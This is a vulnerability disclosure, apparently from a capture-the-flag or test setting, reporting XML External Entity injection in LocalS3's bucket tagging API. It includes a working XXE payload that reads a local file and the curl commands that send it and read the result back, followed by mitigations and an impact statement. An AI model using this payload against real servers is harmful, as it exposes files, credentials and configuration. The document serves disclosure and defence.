Description

The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.

When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.

The vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.

Steps to Reproduce

1. Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)

2. Send a PUT request to the bucket tagging endpoint with the following XML payload:

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE data [
       <!ENTITY xxe SYSTEM "file:///flag.txt" >
   ]>
   <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>
   

   curl -X PUT \
        -H "Host: app" \
        -H "Authorization: AWS dummy:dummy" \
        -H "Content-Type: application/xml" \
        --data-binary @xxe.xml \
        http://app/bucket?tagging
   

3. Retrieve the bucket tags using a GET request to the same endpoint

   curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?tagging
   

4. The content of the targeted file will be returned in the tag value

The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.

Mitigations

• Disable XML external entity resolution in the XML parser configuration
• Implement proper XML parsing security controls such as disabling DTD processing altogether
• Use a safe parser configuration that doesn't process external entities or DTDs by default
• Validate and sanitize all XML input before processing to prevent injection of malicious entities

Impact

Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.